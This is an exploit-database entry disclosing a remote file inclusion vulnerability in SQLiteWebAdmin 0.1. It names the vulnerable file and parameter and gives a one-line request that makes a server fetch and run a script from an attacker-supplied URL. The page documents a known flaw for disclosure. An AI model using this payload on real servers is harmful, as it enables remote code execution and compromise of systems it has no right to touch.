[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SQLiteWebAdmin 0.1 (tpl.inc.php) Remote Include Vulnerability

Author
SirDarckCat
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-645
Category
web applications
Date add
06-08-2006
Platform
unsorted
=============================================================
SQLiteWebAdmin 0.1 (tpl.inc.php) Remote Include Vulnerability
=============================================================



SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin

SQLiteWebAdmin is a simple PHP program for administrating
a SQL DataBase.

It suffers of a Remote File Inclusion Vulnerability.

The bug is in the "tpl.inc.php" program in the "lib"
directory, and is exploited when passing the parameter
"conf[classpath]".

http://www.server.com/lib/tpl.inc.php?conf[classpath]=[URL-OF-SCRIPT]

Succesfull explotation, needs register_globals=on

Att.
SirDarckCat
elhacker.net




#  0day.today [2024-11-15]  #